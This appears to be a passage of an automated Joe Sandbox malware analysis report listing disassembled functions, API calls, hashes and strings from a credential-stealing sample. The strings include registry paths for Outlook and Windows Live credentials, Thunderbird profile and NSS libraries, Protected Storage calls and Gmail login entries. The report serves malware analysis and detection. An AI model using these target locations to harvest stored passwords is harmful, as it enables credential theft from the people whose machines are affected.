                                                                                                                                                                                                          • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                          • API String ID: 2773794195-880857682
                                                                                                                                                                                                          • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                                                                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                                          • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                                          • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                                            • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                                                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                                                                                                                                          • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                                          • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00408B79
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 231171946-0
                                                                                                                                                                                                          • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                          • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1961120804-0
                                                                                                                                                                                                          • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                          • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 00408043 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 129 408043-40818c memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 4081c2-4081c5 129->130 131 40818e 129->131 133 4081f6-4081fa 130->133 134 4081c7-4081d0 130->134 132 408194-40819d 131->132 135 4081a4-4081c0 132->135 136 40819f-4081a3 132->136 137 4081d2-4081d6 134->137 138 4081d7-4081f4 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004080A5
                                                                                                                                                                                                          • memset.MSVCRT ref: 004080B9
                                                                                                                                                                                                          • memset.MSVCRT ref: 004080D3
                                                                                                                                                                                                          • memset.MSVCRT ref: 004080E8
                                                                                                                                                                                                          • GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                                                                                                                                                                                          • GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040815B
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040816A
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040817C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                          • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                          • API String ID: 1832431107-3760989150
                                                                                                                                                                                                          • Opcode ID: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                                                                                                                                                                                          • Instruction ID: 839b780f30062d9b3c48c7c4bb1edbc251b0819f5d773de0f2740150403ea89f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D151D771C0025DAEDB11CBA8CC41BEEBBBCEF49314F0441EAE555AA182D3389B45CB65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00407C87 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 432 407c87-407c90 433 407c92-407cb1 FindFirstFileA 432->433 434 407cb3-407cc7 FindNextFileA 432->434 435 407cce-407cd3 433->435 436 407cd5-407d03 strlen * 2 434->436 437 407cc9 call 407d1f 434->437 435->436 439 407d18-407d1e 435->439 440 407d12 436->440 441 407d05-407d10 call 406e81 436->441 437->435 443 407d15-407d17 440->443 441->443 443->439
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407C9D
                                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407CBB
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00407CEB
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00407CF3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                                          • String ID: .8D
                                                                                                                                                                                                          • API String ID: 379999529-2881260426
                                                                                                                                                                                                          • Opcode ID: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                                                                                                                                                                                          • Instruction ID: eb3e2fb57be8f0c3c515892a2c877e6408fe4d7e79a86a2feb9bdace6263c32c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F11A072909201AFE3109B38D844AEB73DCEF45325F600A2FF05AE31C1EB38A9409729
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401E60 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00401E82
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00401E9B
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00401EA9
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00401EEF
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00401EFD
                                                                                                                                                                                                          • memset.MSVCRT ref: 00401FA8
                                                                                                                                                                                                          • atoi.MSVCRT ref: 00401FD7
                                                                                                                                                                                                          • memset.MSVCRT ref: 00401FFA
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402027
                                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040207D
                                                                                                                                                                                                          • memset.MSVCRT ref: 00402092
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00402098
                                                                                                                                                                                                          • strlen.MSVCRT ref: 004020A6
                                                                                                                                                                                                          • strlen.MSVCRT ref: 004020D9
                                                                                                                                                                                                          • strlen.MSVCRT ref: 004020E7
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040200F
                                                                                                                                                                                                            • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                                            • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040216E
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402178
                                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 00402193
                                                                                                                                                                                                            • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                                                                          • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                                          • API String ID: 1846531875-4223776976
                                                                                                                                                                                                          • Opcode ID: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                                                                                                                                                                                          • Instruction ID: f32954dd371ee46ce489a3e15048bba03ea5248cf67d2e34683548b394895fb7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA91D772804118AAEB21E7A1CC46FDF77BC9F54315F1400BBF608F2182EB789B858B59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040CC66 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 169COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00404A94: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                                                                                                                                                                                            • Part of subcall function 00404A94: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                                                                                                                                                                                            • Part of subcall function 00404A94: FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                                                                                                                                                                                            • Part of subcall function 00404A94: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040CEB2
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040CEC8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                                          • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                                          • API String ID: 745651260-375988210
                                                                                                                                                                                                          • Opcode ID: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
                                                                                                                                                                                                          • Instruction ID: 177dcc30e6d6fe1e6f6b961e060c6fa8e32a60297cdf5fc43279ddd28c1616a1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3661A075408341DBDB20AFA1DC88A9FB7F8BF85305F00093FF545A21A2DB789904CB5A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403C03 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00410166: FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C22
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C37
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00403E41
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CC3
                                                                                                                                                                                                          • pstorec.dll, xrefs: 00403C1D
                                                                                                                                                                                                          • www.google.com/Please log in to your Google Account, xrefs: 00403C87
                                                                                                                                                                                                          • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403D91
                                                                                                                                                                                                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CE8
                                                                                                                                                                                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D2F
                                                                                                                                                                                                          • www.google.com/Please log in to your Gmail account, xrefs: 00403C73
                                                                                                                                                                                                          • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D5B
                                                                                                                                                                                                          • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D28
                                                                                                                                                                                                          • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C7D
                                                                                                                                                                                                          • PStoreCreateInstance, xrefs: 00403C31
                                                                                                                                                                                                          • www.google.com:443/Please log in to your Google Account, xrefs: 00403C91
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                                          • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                          • API String ID: 1197458902-317895162
                                                                                                                                                                                                          • Opcode ID: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                                                                                                                                                                                          • Instruction ID: 8c3092e028ed30b7bcb0bf0438431f6e947b4810b401e401bf51def59c6c6aaf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C51A571600615B6E714AF71CD86FEAB76CAF00709F20053FF904B61C2DBBDBA5486A9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040F478 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101registryCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 231 40f478-40f4ad call 4446d0 RegOpenKeyExA 234 40f4b3-40f4c7 RegOpenKeyExA 231->234 235 40f5af-40f5b5 231->235 236 40f5a5-40f5a9 RegCloseKey 234->236 237 40f4cd-40f4f6 RegQueryValueExA 234->237 236->235 238 40f59b-40f59f RegCloseKey 237->238 239 40f4fc-40f50b call 40472f 237->239 238->236 239->238 242 40f511-40f549 call 4047a0 239->242 242->238 245 40f54b-40f553 242->245 246 40f591-40f595 LocalFree 245->246 247 40f555-40f58c memcpy * 2 call 40f177 245->247 246->238 247->246
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4A9
                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4C3
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E6C,?), ref: 0040F4EE
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E6C,?), ref: 0040F59F
                                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040F55C
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040F571
                                                                                                                                                                                                            • Part of subcall function 0040F177: RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                                                                            • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1BF
                                                                                                                                                                                                            • Part of subcall function 0040F177: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                                                                                                                                                                                            • Part of subcall function 0040F177: RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E6C,?), ref: 0040F595
                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E6C,?), ref: 0040F5A9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                                          • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                                          • API String ID: 2768085393-888555734
                                                                                                                                                                                                          • Opcode ID: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                                                                          • Instruction ID: 1e95abdde633212bff99c09de4f86b0a88236e9255236bdff490daf84838ddbe
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F316FB2108305BFD710DF51DC80D9BB7ECEB89758F00093AFA84E2151D734D9198BAA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0044412E Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 249 44412e-44414a call 44431c GetModuleHandleA 252 44414c-444157 249->252 253 44416b-44416e 249->253 252->253 254 444159-444162 252->254 255 444197-4441e4 __set_app_type __p__fmode __p__commode call 444318 253->255 256 444164-444169 254->256 257 444183-444187 254->257 264 4441e6-4441f1 __setusermatherr 255->264 265 4441f2-44424c call 444306 _initterm __getmainargs _initterm 255->265 256->253 259 444170-444177 256->259 257->253 260 444189-44418b 257->260 259->253 262 444179-444181 259->262 263 444191-444194 260->263 262->263 263->255 264->265 268 44424e-444256 265->268 269 444288-44428b 265->269 270 44425c-44425f 268->270 271 444258-44425a 268->271 272 444265-444269 269->272 273 44428d-444291 269->273 270->272 274 444261-444262 270->274 271->268 271->270 275 44426f-444280 GetStartupInfoA 272->275 276 44426b-44426d 272->276 273->269 274->272 277 444282-444286 275->277 278 444293-444295 275->278 276->274 276->275 279 444296-4442aa GetModuleHandleA call 40cc66 277->279 278->279 282 4442b3-4442f3 _cexit call 444355 279->282 283 4442ac-4442ad exit 279->283 283->282
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3662548030-0
                                                                                                                                                                                                          • Opcode ID: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
                                                                                                                                                                                                          • Instruction ID: fc298a0057bb7b157c7d5bb9a283569fada43ed9a32b195ba4478b44b5386df1
